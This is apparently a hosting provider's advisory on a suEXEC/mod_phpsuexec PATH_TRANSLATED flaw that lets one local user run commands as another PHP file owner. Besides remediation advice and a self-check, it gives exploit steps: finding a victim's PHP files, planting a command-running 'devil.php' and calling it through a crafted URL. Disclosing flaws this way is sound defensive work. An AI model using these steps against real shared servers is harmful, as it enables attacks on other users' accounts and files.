A-Squad Certified Secure cPanel Hosting

suEXEC mod_phpsuexec PATH_TRANSLATED Vulnerability

Any user on your machine can execute any arbitrary command as any other user that owns a php file. Although a little complex to exploit, this is a very severe vulnerability. If you are the administrator, you can eliminate this vulnerability by upgrading to Apache 1.3.31 or later or by switching back to mod_php (option 1). If you are the user, then delete all .php files you own immediately. Even if you own a totally empty (zero byte) file called blank.php, then this allows everyone to execute whatever they want as you. But if you really wanted to use a php script somewhere on your site, I suggest you frequently make backups of everything including all your databases since everyone has access to read, manipulate, and destroy all of your files and directories. You should notify your host immediately.
If you host with A-Squad, you'll be safe.
Example 1: A quick way to verify if you are vulnerable or not is to follow these steps:
  1. Create a file called simple.php: <?php echo "PHP Works."; ?>
  2. Make sure it works in the browser. http://www.yoursite.com/simple.php
  3. Now try it with extra slash stuff on the end. http://www.yoursite.com/simple.php/foo
  4. If it still runs, you're safe. If it crashes with a 404 Error or says "No input file specified", then you are vulnerable.
Example 2: Need more proof? If the hacker user wants to execute arbitrary commands as the victim user, he can follow these steps:
  1. Find any php file owned by the victim. find ~victim/public_html -name \*.php or grep /victim/.*.php /usr/local/apache/logs/error_log or the easiest way is to simply click around on the victim's web site until a .php link is found. Let's say there exists a file called /home/victim/public_html/index.php.
  2. Create a php script called /home/hacker/public_html/devil.php that does arbitrary php code: <?php echo `id` ?>
  3. Disable WEBROOT protection for the hacker user: chmod a+x ~ ~/public_html
  4. Now the victim will have permission to read (and execute) the hacker owned script.
  5. Exploit the vulnerability: http://IP.AD.RE.SS/~victim/index.php/~hacker/devil.php which will execute the devil.php script as the victim user.